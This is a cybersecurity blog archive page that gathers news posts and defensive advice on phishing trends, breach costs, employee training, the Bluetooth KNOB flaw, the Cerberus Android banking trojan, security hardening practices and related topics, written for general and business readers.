Category Archives: Cybersecurity

Quantum computing: The new moonshot in the cyber space race

In 2016, China launched Micius, the world’s first quantum communications enabled satellite. For some, that launch eerily echoed the launch of the Soviet Union’s Sputnik satellite in 1957, which caught the United States off guard and spurred a decades-long contest to regain and maintain global technological and military supremacy. The parallel wasn’t lost on the Chinese. Jian-Wei Pan, the lead researcher on the Micius project, hailed the start of “a worldwide quantum space race.” Indeed, … More

The post Quantum computing: The new moonshot in the cyber space race appeared first on Help Net Security.

Facebook phishing surges, Microsoft still most impersonated brand

Vade Secure published the results of its Phishers’ Favorites report for Q2 2019. According to the report, which ranks the 25 most impersonated brands in phishing attacks, Microsoft was by far the top target for the fifth straight quarter. There was also a significant uptick in Facebook phishing, as the social media giant moved up to the third spot on the list as a result of a staggering 176 percent YoY growth in phishing URLs. … More

The post Facebook phishing surges, Microsoft still most impersonated brand appeared first on Help Net Security.

The transformation of enterprise security from 2017 to 2019

Estimated reading time: 2 minutes

The nature of enterprise security is such that it continuously keeps evolving. Trends change, threats vary and morph into different entities, approaches that seem relevant get outdated in six months or sometimes even lesser. For enterprises looking to stay ahead of the curve when it comes to cybersecurity, staying stagnant is not an option. The need of the hour is to keep abreast of the latest new trends and technologies to stay safe.

Thanks to the speed of transformation, enterprise security has seen multifold changes in the last two years, some due to need and some due to necessity. These changes can be summed up through the following pointers:

A move towards a zero-trust network

More and more organizations are moving towards a zero-trust model where no one and nothing is trusted. Introduced by American market research giant, Forrester Research, the zero-trust network model eliminates the concept of a perimeter and calls for enterprises to inspect all network traffic without any classification of ‘internal’ and ‘external.’. Basically, no user or traffic is considered ‘authorized’ and all access to a specific network is governed by the same set of rules.

The evolution from 4G to 5G

In 2017, enterprise security needed to understand 4G – now, network technology has evolved to such an extent that the world is embracing 5G. It is a trend which enterprises must also embrace but at the same time, be aware of the security tradeoffs. As with the advent of any new technology, cybercriminals will also join the bandwagon to ensure they create chaos and profit. 5G will likely have different types of phones, different networks and a completely different kind of technology which will open up new vulnerabilities – early adopters should be extremely careful.

The rise of cryptojacking

An important trend which has caught the industry’s attention is the dangerous threat of cryptojacking. This is a threat which will only become more widespread as the usage of cryptocurrency increases. It works by hackers sending unsuspecting targeted emails with malicious code in them -or they embed this code into sketchy websites. The attack succeeds if malicious code is accessed by unsuspecting users – this malicious code works in the background, silently mining cryptocurrency. This takes up a lot of computer resources and can often lead to slow system performance.

Spear phishing

While phishing is a tactic that continues to be used, it has an upgraded, even more dangerous avatar, popularly known as spear phishing. In spear phishing, users get meticulously personalized emails from a trusted source or a company you’re familiar with and interact quite often. This could be as scrupulous as an email from a friend, colleague or your boss asking you for access to classified information. Attackers are now closely examining their targets and gathering as much information about them to ensure their email is as believable as possible. This is done by employing Advanced Persistent Threats (APTs) to entire systems, gathering humongous amounts of data about enterprise and customer habits, and then using this data to launch a spear-phishing campaign.

Certainly, enterprise security has seen a lot of changes in the last two years which is a natural state of affairs in this sector. It is important for enterprises to invest in solutions which continue to evolve and stay attuned to the latest cybersecurity trends to ensure they are not lagging behind. Seqrite’s range of enterprise security solutions is continuously updated to enable enterprises to remain safe from the ever-evolving threats in today’s digital age.

The post The transformation of enterprise security from 2017 to 2019 appeared first on Seqrite Blog.

Unlocking the future of blockchain innovation with privacy-preserving technologies

The origins of blockchain as many are familiar with it today can be traced back to the Bitcoin whitepaper, first published in 2008 by Satoshi Nakamoto, which offered a vision of a new financial system underscored by cryptography and trust in code. Throughout the past decade, iterations of this technological infrastructure have gradually built out a diverse industry ecosystem, allowing for use cases that extend beyond cryptocurrencies and peer-to-peer transactions. From smart contracts to asset … More

The post Unlocking the future of blockchain innovation with privacy-preserving technologies appeared first on Help Net Security.

From SmarterChild to Siri: Why AI is the competitive advantage securing businesses

The dream of an AI-influenced world is finally here. After decades of writing about it, AI has reached a point where it’s ingrained into our daily lives. From the days of SmarterChild – for many, the AIM messenger bot was the first foray into AI – to now the ubiquitous presence of the AI-enabled digital assistant such as Siri, the vision of artificial intelligence transforming
 from sci-fi to reality has come to fruition. But instead … More

The post From SmarterChild to Siri: Why AI is the competitive advantage securing businesses appeared first on Help Net Security.

Identifying evasive threats hiding inside the network

There is no greater security risk to an organization than a threat actor that knows how to operate under the radar. Malicious insiders and external cybercriminals are getting savvier. They are better at blending in without tripping any alerts. They skip over tools and techniques that trigger standard security systems. How can a company tell them apart from the noise created by legitimate logins to the network that day? The answer lies in context. It … More

The post Identifying evasive threats hiding inside the network appeared first on Help Net Security.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas, which is the cost of Dealing with an attack in 4 Industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

How Your Company Can Prevent a Cyberattack

Capital One’s announcement of a hack that affected more than 100 million people should have you asking not what, but who’s in your wallet. The company estimated a year-one expense ranging from $100-$150 million. Equifax settled recently on a penalty of more than $700 million. Getting cyber wrong is expensive.

Getting cyber wrong–i.e., all the ways that can become manifest–is of course also complex. There will soon be more than 30 billion connected devices “out there’ in consumer hands, on their wrists, in their laps, cars, kitchens, walls, and, yes, at work–in short, IoT is everywhere, our connectables almost always go with us.

Okay, so the obvious metaphor everyone is used to is the vectors of a virus on the move. The president catches a bug in North Korea, and next thing you know everyone at Mar-a-Lago has it. Rachel Maddow catches a cold while fly-fishing on the Housatonic, and next thing you know the whole Democratic establishment has it. Bob from accounting goes on vacation with his laptop, and the next thing you know, millions of customers get hacked.

Bob, you’re fired.

It’s All About Attackable Surface

Tortoises have cyber down pat, both for real and metaphorically. Ever heard about a tortoise getting hacked? The reason you haven’t is because there’s nothing to get.

Tortoises have no finances and, taken as a genus, they rarely have names and social media accounts. When they do have names and Instagram accounts, there’s a hackable human somewhere nearby. Tortoises are not the problem.

If only our employees had the cyber equivalent of what tortoises have. What’s not to like about a having a hard shell? Better, what about one into which one can retract all their vulnerable areas? They also move slow, which in fable allowed at least one of them to beat a hare in a foot race. Among other things, this slowness means fewer clicked links in phishing emails.

Tortoises have a lot of what it takes to be cybersafe–though admittedly in an environment where things have to get done, often quickly, they don’t make the most attractive choice for corporate spirit animal.

Cyber Is a Marathon, Not a Sprint

So, the order of the day is for sure not something like, “Consumers and businesses alike: Be the tortoise!” Not quite. The turtle is to the cybersecurity of your enterprise what campaign slogans like “Make America Great Again” or “Yes We Can” are to the country. I mean, let’s face it, tortoises are not renowned for their earning capacity. That said, they can be inspirational–or at least aspirational. They can help us think about what good cyber looks like.

My marketing department would do a facepalm if I were to recommend courses that you can offer employees to improve their cybersecurity practices, because I own a company that is dedicated to helping companies and individuals stay as safe as possible in our current state of persistent threat. That said, there are some guiding principles of cybersecurity, particularly in the workplace, that I will share with you. They are at the bedrock of our practice, because they work.

Choices? There’s Really Only One

There is a critical mass of options out there for cybersecurity employee training, online and otherwise. By now, we should expect to be seeing puppet shows on the dangers of phishing.

All that aside, the best solution is free. It is creating a culture of cyber threat awareness and best practices. As Peter Drucker once said, “Culture eats strategy for breakfast.”

While I am only going to name one here, there are programs–both for-profit and public advocacy based–that help small and medium-sized businesses learn to be safer and more secure. A non-profit called the National Cyber Security Alliance offers a series of in-person, highly interactive and easy-to-understand workshops based on the National Institute of Standards and Technology (NIST) Cybersecurity Framework.

For-profit choices are legion. They may offer continuous training programs to help thwart phishing attacks and malware infections. There may be modules to go through for employees, or PowerPoint courses, or quizzes. Other programs cover specific topics, like how to navigate the web without picking up a virus, how to recognize social engineering (a fancy term for the hacking practice of luring in unsuspecting victims with links and offers of this or that slice of paradise), safe mobile practice, safe travel practices, safe email practice, and much more.

Other companies offer training courses as part of the onboarding process, and it should go without saying that at this point in the story arc of cyber insecurity, any enterprise that doesn’t secure employee devices during the onboarding process is courting disaster.

Cybersecurity Is Not a Spectacle Sport

Whether you send daily (or weekly) emails listing the latest threats or you talk about it at all-in meetings, cyber needs to be a part of everyday life to keep your enterprise as safe as possible.

The basic tasks that need to be accomplished:

1.      Phish-proof your employees. Teach employees how to recognize phishing attacks, and what happens when they occur.

2.      Foster good end-user practices. Make sure employees know what good password practices look like. Talk about computer-hygiene practices, and commonsense defenses against the threat of insider attacks.

3.      Change management. Change fosters insecurity, and that’s when we’re most vulnerable to attack. Teach employees how to manage cyber during enterprise-wide change.

And then there is the more technical stuff for your CISO, whether that person is in-house or subcontracted. Don’t have anyone playing this role? Figure it out by Monday.

All of the above is fine and good, but I think principles–creating a culture of cyber awareness–is generally more effective, which is why I favor cyber training that is aimed at minimizing, monitoring, and managing cyber risk.

While there are many products and classes out there, and many of them are no doubt workable solutions, here’s the basics of a cultural (and free) approach:

Minimize exposure.

Employees should never authenticate themselves to anyone unless they are in control of the interaction. Oversharing on social media expands one’s attackable surface. Be a good steward of passwords, safeguard any documents that can be used to hack an account or workstation, and in general stay vigilant. Attacks happen. All the time.

Monitor accounts.

A compromised employee can lead to a compromised company. One way your employees can make sure they haven’t been personally compromised is to check their credit reports religiously, keep track of their credit score, and review major accounts daily. Transaction alerts from financial services institutions and credit card companies can help. Your human resources department may want to explore the possibility of offering a credit and identity monitoring program to employees as an added benefit.

Manage the damage.

When something happens, get on top of it quickly and/or get help from professionals who can help navigate and resolve the situation–whatever it is.

Slow and steady wins this seemingly unwinnable race. Sound paradoxical? It is. Cyber security is a practice, not a product. There is no one way to solve the cybersecurity quagmire, but there are very established routes through it, and you owe it to your company to learn them and teach them to everyone you work with.

The post How Your Company Can Prevent a Cyberattack appeared first on Adam Levin.

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Analytics 101

From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” to select Machine Learning, Deep Learning, or Artificial Intelligence analytics.  In fact, sometimes a combination of these approaches is required, like many McAfee products including McAfee Investigator.  Human-machine teaming as well as a layered approach to security can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Digital Parenting: How to Keep the Peace with Your Kids Online

Simply by downloading the right combination of apps, parents can now track their child’s location 24/7, monitor their same social conversations, and inject their thoughts into their lives in a split second. To a parent, that’s called safety. To kids, it’s considered maddening.

Kids are making it clear that parents armed with apps are overstepping their roles in many ways. And, parents, concerned about the risks online are making it clear they aren’t about to let their kids run wild.

I recently watched the relationship of a mother and her 16-year-old daughter fall apart over the course of a year. When the daughter got her driver’s license (along with her first boyfriend), the mother started tracking her daughter’s location with the Life360 app to ease her mind. However, the more she tracked, the more the confrontations escalated. Eventually, the daughter, feeling penned in, waged a full-blown rebellion that is still going strong.

There’s no perfect way to parent, especially in the digital space. There are, however, a few ways that might help us drive our digital lanes more efficiently and keep the peace. But first, we may need to curb (or ‘chill out on’ as my kids put it) some annoying behaviors we may have picked up along the way.

Here are just a few ways to keep the peace and avoid colliding with your kids online:

Interact with care on their social media. It’s not personal. It’s human nature. Kids (tweens and teens) don’t want to hang out with their parents in public — that especially applies online. They also usually aren’t too crazy about you connecting with their friends online. And tagging your tween or teen in photos? Yeah, that’s taboo. Tip: If you need to comment on a photo (be it positive or negative) do it in person or with a direct message, not under the floodlights of social media. This is simply respecting your child’s social boundaries. 

Ask before you share pictures. Most parents think posting pictures of their kids online is a simple expression of love or pride, but to kids, it can be extremely embarrassing, and even an invasion of privacy. Tip: Be discerning about how much you post about your kids online and what you post. Junior may not think a baby picture of him potty training is so cute. Go the extra step and ask your child’s permission before posting a photo of them.

Keep tracking and monitoring in check. Just because you have the means to monitor your kids 24/7 doesn’t mean you should. It’s wise to know where your child goes online (and off) but when that action slips into a preoccupation, it can wreck a relationship (it’s also exhausting). The fact that some kids make poor digital choices doesn’t mean your child will. If your fears about the online world and assumptions about your child’s behavior have led you to obsessively track their location, monitor their conversations, and hover online, it may be time to re-engineer your approach. Tip: Put the relationship with your child first. Invest as much time into talking to your kids and spending one-one time with them as you do tracking them. Put conversation before control so that you can parent from confidence, rather than fear.

Avoid interfering in conflicts. Kids will be bullied, meet people who don’t like them and go through tough situations. Keeping kids safe online can be done with wise, respectful monitoring. However, that monitoring can slip into lawnmower parenting (mowing over any obstacle that gets in a child’s path) as described in this viral essay. Tip: Don’t block your child’s path to becoming a capable adult. Unless there’s a serious issue to your child’s health and safety, try to stay out of his or her online conflicts. Keep it on your radar but let it play out. Allow your child to deal with peers, feel pain, and find solutions. 

As parents, we’re all trying to find the balance between allowing kids to have their space online and still keep them safe. Too much tracking can cause serious family strife while too little can be inattentive in light of the risks. Parenting today is a difficult road that’s always a work-in-progress so give yourself permission to keep learning and improving your process along the way

The post Digital Parenting: How to Keep the Peace with Your Kids Online appeared first on McAfee Blogs.

Essential practices to strengthen your business’ cybersecurity

Estimated reading time: 4 minutes

With enterprises being the centre of attention of an ever-evolving threat landscape, foolproof security of business assets has become the need of the hour. To counter the menace of cyberattacks, today we have businesses that specialize in the development and deployment of advanced and futuristic solutions that have the capability to defend businesses from the most dangerous of malware.

However, this vigilance may falter if enterprise stakeholders are not cautious about the basics of cybersecurity. Every critical aspect such as email, user access, software updates et al. needs to be optimized so that even a worst-case scenario pertaining to cyberattacks turns in the business’ favour.

Seqrite intends to educate its esteemed customers about very simple but effective steps that organizations need to integrate into their status quo to bolster cybersecurity.

Regular data backups

Data backups are essential because ransomware is notorious for locking enterprise data and demanding monetary benefits in exchange for data release. There is other malware too that may make businesses lose 100 % of their critical data.

Hence –

  • Back up your important data regularly and keep a recent backup copy offline
  • Encrypt your backup
  • Always use a combination of online and offline backup
  • If your computer gets infected with ransomware, your files can be restored from the offline backup, once the malware has been removed
  • Do not keep offline backups connected to your system as this data could be encrypted when ransomware strikes

Grants

Administrators should practice extreme caution while granting rights to the business workforce. Pin-point accuracy is a must while assigning access rights to employees. Admins should have absolute clarity about what parts of the business should be accessible to which users.

Hence –

  • Regularly audit local/domain Users and remove/disable unwanted users
  • Set strong passwords for every business account
  • A strong password includes a combination of –
  • Letters in upper case
  • Letters in lower case
  • Numbers & special characters
  • Password should consist of a minimum 8-10 characters
  • Mandating a password change on a periodic basis
  • A bad example would be common passwords like P@ssw0rd, Admin@123#, etc.
  • Set password expiration & account lockout policies (in case the wrong password is entered)
  • Don’t assign Administrator privileges to users
  • If possible enable Multi-Factor authentication to ensure all logins are legitimate
  • Don’t stay logged in as an administrator, unless it is strictly necessary.
  • Avoid browsing, opening documents or other regular work activities while logged in as an administrator

Software updates

Software updates drop the latest fixes to bugs and patches to every software entity present in your business.

Hence –

  • Keep your Operating System and other software updated. Software updates frequently include patches for newly discovered security vulnerabilities which could be exploited by attackers. Apply patches and updates for software like Microsoft Office, Java, Adobe Reader, Flash, and Internet Browsers like Internet Explorer, Chrome, Firefox, Opera, etc., including Browser Plugins
  • Always keep your security software (antivirus, firewall, etc.) up-to-date to protect your computer from new variants of malware
  • Do not download cracked/pirated software, as they risk backdoor entry for malware into your computer
  • Avoid downloading software from untrusted P2P or torrent sites. In most cases, they harbour malicious software

Securing network and shared folders

Typically, network and shared folders are home to the most confidential business data. Hackers are always on a prowl to break-in to these folders and gain access to highly-sensitive information.

Hence –

  • Keep strong and unique passwords for login accounts and network shares
  • Disable unnecessary, admin share. i.e. admin$. Give access permission to shared data as per requirement
  • Audit RDP access & disable it if not required or, set appropriate rules to allow only specific & intended systems
  • Change RDP port to a non-standard port
  • Configure firewall in the following way –
    • o Deny access to all to important ports (in this case RDP port 3389)
    • o Allow access to only IP’s which are under your control
  • Use a VPN to access the network, instead of exposing RDP to the Internet
  • Possibly implement Two Factor Authentication (2FA)
  • Set lockout policy which hinders guessing of credentials
  • Create a separate network folder for each user when managing access to shared network folders
  • Don’t keep shared software in executable form

Email

No business can function without email. History is proof that email is one of the most go-to channels for hackers to propel cyber attacks.

Hence –

  • Enable Multi-Factor authentication to ensure all logins are legitimate
  • Set password expiration & account lockout policies (in case the wrong password is entered)
  • Don’t open attachments and links in an email sent by an unknown, unexpected or unwanted source. Delete suspicious-looking emails you receive from unknown sources, especially if they contain links or attachments
  • Cybercriminals use ‘Social Engineering’ techniques to trick users into opening attachments or clicking on links that lead to infected websites
  • Always turn on email protection of your antivirus software

Disable macros for Microsoft Office

Fairly self-explanatory, macros should be disabled because a lot of malware penetrates due to the enablement of macros.

Hence –

  • Do not enable ‘macros’ or ‘editing mode’ by default upon execution of the document, especially for attachments received via emails. A lot of malware infections rely on your action to turn on macros
  • Consider installing Microsoft Office Viewers. These viewer applications let you see what documents look like without even opening them in Word or Excel. More importantly, the viewer software doesn’t support macros at all, so this reduces the risk of enabling macros unintentionally

Secure browsing

Web browsers are the most sought out channels for malware attacks – everybody knows it.

Hence –

  • Always update your browser
  • Try to avoid downloading pirated/cracked media or software from sites like torrents
  • Block the ad pop-ups in the browser.
  • Always verify whether you are accessing the genuine site by checking the address bar of the browser. Phishing sites may show contents like a genuine one
  • Bookmark important sites to avoid being a victim of phishing
  • Do not share your personal details like name, contact number, email id, social networking site credentials for any unknown website
  • Do not install extensions in browsers which you are not fully aware of. Lookout for impersonating web-pages and do not allow any prompt on an unknown web page that you are visiting. Avoid visiting crack software download websites
  • Policies should be clearly communicated for employees opting for BYOD (Bring Your Own Devices) facilities
  • Policies for using official applications on platforms other than office infrastructure should be established

 

Lastly, for pen drives, disable the autorun feature if not needed and regularly educate employees for best cybersecurity practices.

Seqrite is Quick Heal Technologies’ flagship enterprise product – the company is a stalwart and an industry major that has spearheaded the movement about the importance of cybersecurity. Hope, this educational document helps.

Please get in touch with us for any specific questions.

The post Essential practices to strengthen your business’ cybersecurity appeared first on Seqrite Blog.

“KNOB” Security Flaw Exploits All Versions Of Bluetooth Devices

There are times when technology becomes too ubiquitous and too accessible by the public for its own good, it becomes a favorite target of cybercriminals. Discovery of vulnerability by security researchers is a good thing, but may just be the tip of the iceberg. One such technology is Bluetooth, which every new version often comes with “patches” to fix the older version. The latest version at the time of this writing is Bluetooth v5.1, which added more features compared to older versions but at the same time, fixes the security flaws introduced by the previous version (v5.0).

Now, with version 5.1 a critical security flaw documented under CVE-2019-9506 has been exposed by the Center for IT-Security, Privacy, and Accountability (CISPA), in partnership with Amazon, Apple, Intel, Microsoft, and Cisco. Credit goes to the following security researchers: Prof. Kasper Rasmussen, University of Oxford, England; Dr. Nils Ole Tippenhauer, CISPA, Germany and Daniele Antonioli from SUTD, Singapore. The bug was demonstrated publicly in the currently ongoing (at the time of this writing) USENIX Security Symposium. The group calls the vulnerability as “KNOB” which affects all Bluetooth devices complying with version 1.0 to 5.1. It provides the attacker the capability to dilute the effectiveness of encryption of Bluetooth devices through shortening the length of the encryption key to just a single octet. With this process, a simple brute-force attack will be enough to break the otherwise secure Bluetooth encryption process.

The researchers identified that it is possible for an attacking device to interfere with the procedure used to set up encryption on a BR/EDR connection between two devices in such a way as to reduce the length of the encryption key use. In addition, since not all Bluetooth specifications mandate a minimum encryption key length, it is possible that some vendors may have developed Bluetooth products where the length of the encryption key used on a BR/EDR connection could be set by an attacking device down to a single octet,” explained by Bluetooth Special Interest Group’s (BSig) Security Notice Press Release.

A successful brute-force attack will then provide full access to the device connections, enabling the attackers to act as a man-in-the-middle during the pairing process between Bluetooth host and client. This manipulation capability includes inserting Bluetooth commands, track keystrokes and launch resident monitor for the PAN (Personal Area Network – the network type established by Bluetooth devices between one another).

The good news though is the fact that it is not easy to exploit. The attacker needs to make sure that the two devices communicating are BR/EDR spec-compliant. Since we’re talking about Bluetooth devices, he needs to be in proximity of the devices that he wants to exploit. And successful penetration needs to be repeated in the event the two device gets unpaired (which resets the encryption key).

Bluetooth SIG has updated the Bluetooth Core Specification to recommend a minimum encryption key length of 7 octets for BR/EDR connections. The Bluetooth SIG will also include testing for this new recommendation within our Bluetooth Qualification Program. In addition, the Bluetooth SIG strongly recommends that product developers update existing solutions to enforce a minimum encryption key length of 7 octets for BR/EDR connections,” concluded BSig.

Also Read,

New Hacking Technique Using Bluetooth Exposed

Intel Discovers And Publishes New Bluetooth Vulnerability

DefCon 2018: Bluetooth Low Energy Sniffing Tool Publicly Available

The post “KNOB” Security Flaw Exploits All Versions Of Bluetooth Devices appeared first on .

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim’s contact list. What’s more, the author of the Cerberus malware has decided to rent out the banking trojan to other cybercriminals as a means to spread these attacks.

According to The Hacker News, the author claims that this malware was completely written from scratch and doesn’t reuse code from other existing banking trojans. Researchers who analyzed a sample of the Cerberus trojan found that it has a pretty common list of features including the ability to take screenshots, hijacking SMS messages, stealing contact lists, stealing account credentials, and more.

When an Android device becomes infected with the Cerberus trojan, the malware hides its icon from the application drawer. Then, it disguises itself as Flash Player Service to gain accessibility permission. If permission is granted, Cerberus will automatically register the compromised device to its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking information, Cerberus launches remote screen overlay attacks. This type of attack displays an overlay on top of legitimate mobile banking apps and tricks users into entering their credentials onto a fake login screen. What’s more, Cerberus has already developed overlay attacks for a total of 30 unique targets and banking apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download.Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution.Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could bring more avenues for potential cyberthreats, potentially increasing the likelihood of denial-of-service, or DDoS, attacks due to the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves here. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speedbumps.

